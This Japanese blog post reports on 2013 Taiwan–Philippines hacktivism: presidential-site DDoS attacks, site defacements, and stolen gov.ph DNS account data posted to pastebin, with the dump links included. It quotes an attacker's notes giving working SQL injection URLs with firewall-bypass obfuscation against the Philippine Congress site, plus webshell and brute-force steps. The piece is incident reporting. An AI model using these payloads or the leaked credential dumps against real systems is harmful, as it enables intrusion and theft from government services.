ハクティビズム|台湾/フィリピン

時間が少し経ちましたが2013年5月、台湾とフィリピン双方が排他的経済水域を主張する海域で、フィリピン沿岸警備隊が台湾漁船に発砲し、船員1人が死亡する事件が起こりました。そのあと、両者間でサイバー攻撃(ハクティビズム)が起きています。

f:id:alienware:20140520094903j:plain

 

●総統サイトへの DDoS 攻撃
いつものように双方の攻撃リストが上がり、F5攻撃などの DDoS 攻撃が始り、特に双方の総統府サイトが標的になりました。このような攻撃に対し、それぞれサイト側の対処は対照的でした:

・台湾総統府サイト(www.president.gov.tw):
→台湾以外のIPからのアクセスを全てブロック
・フィリピン総統府(www.president.gov.ph)サイト:
→クラウドフレアのCDNサービスを用いて負荷分散
→更に台湾IPからのアクセスに対しては、画像認証(CAPTCHA)を実施

 

f:id:alienware:20140520095848j:plain

 

●サイト改ざん
フィリピンのグループ「Pinoy Vendetta」がFB上で「HACKED WARNING to .TW」、「Warning to Taiwan」などを表題とした改ざんサイトを掲載し、その以降双方で交互改ざんが続きました。

f:id:alienware:20140520101753p:plain

f:id:alienware:20140520100041j:plain

 

f:id:alienware:20140520100059j:plain

 

●dns.gov.ph DBの公開

5月13日に台湾側がフィリピン DNS サーバ(dns.gov.ph)への侵入・改ざんが成功し、更にデータベースを抜き取り、莫大な gov.ph ドメインの DNS管理アカウント情報を抜き取り、公開しました。

http://pastebin.com/D7gCEdS6
http://pastebin.com/9SpBC8Xm
http://pastebin.com/d8i5e27s
http://pastebin.com/bdMCsr9Y
http://pastebin.com/MskH8t07
http://pastebin.com/aM7Luk4K

f:id:alienware:20140520140819p:plain

 

f:id:alienware:20140520111436j:plain

 

●gov.ph への侵入ノート (中國網公盟より)
さてこちらでフィリピン政府ドメイン gov.ph の侵入について、実際攻撃者が書き下ろしたノートがあります。サイトが侵入された経緯が一部伺えます。
------------
gov.ph サイトそのものは長らく wordpress で構築されていた。
初めて侵入を受けたのは約 5 年前で、当時も古いバージョンの MySQL を使っており、 ポート 3306が開放状態で、認証回避脆弱性を利用し root 権限を取得出来た。
2度目の侵入はその1年後に起こり、 Wordpress 管理画面へのブルートフォースアタックを行い侵入し、ウェブエディタ経由で webshell(バックドア)が設置できた。それ以来数えきれないほどの侵入を繰り返し受け、実にいろんな国の侵入者が侵入成功しサイト中に陣取っていた。

少し前まで、いくつかの重要サービスは実は同じサーバで提供されていた。例えばi.gov.ph や dns.gov.ph などがこれにあたる。これにより管理が煩雑になりセキュリティ問題が起こる確率が上がるのは想像しやすい。また、フィリピン国会 サイト(congress.gov.xx)は古典的なSQLインジェクションなどに晒されていた。

congress.gov.xx/press/details.php?pressid=7682+order+by+8
→正常
congress.gov.xx/press/details.php?pressid=7682+order+by+9
→空白 ※カラム数:8
congress.gov.xx/press/details.php?pressid=7682+union+select
→ファイアーウォールが作動
→ファイアーウォールを迂回:
congress.gov.ph/press/details.php?pressid=7682+UniOn/*xxxxxxxxxxxxxxxxxxxxxxxx*/+/*!select*/

congress.gov.xx/press/details.php?pressid=7682+UniOn/*xxxxxxxxxxxxxxxxxxxxxxxx*/+/*!select*/+1,2,3,4,5,6,7,8
→ファイアーウォール作動
→ファイアーウォールを迂回:congress.gov.xx/press/details.php?pressid=0+UniOn/*xxxxxxxxxxxxxxxxxxxxxxxx*/+/*!select*/1/*xfdf*/,/*sdf*/2/*xfdf*/,/*sdf*/3/*xfdf*/,/*sdf*/4/*xfdf*/,/*sdf*/5/*xfdf*/,/*sdf*/6/*xfdf*/,/*sdf*/7/*xfdf*/,/*sdf*/8+--+
※長さ8のワードを抽出

・・・


サイト管理者のリソースが限られているのか、脆弱性に対しての対処は不足していたし、問題発生後はファイアウォール設置のみで解決を図っている模様だった。

 

【参考】
-台灣V.S.菲律賓駭客PK,從DDoS到入侵DNS
-台灣、菲律賓網路駭客攻防戰
-中國網公盟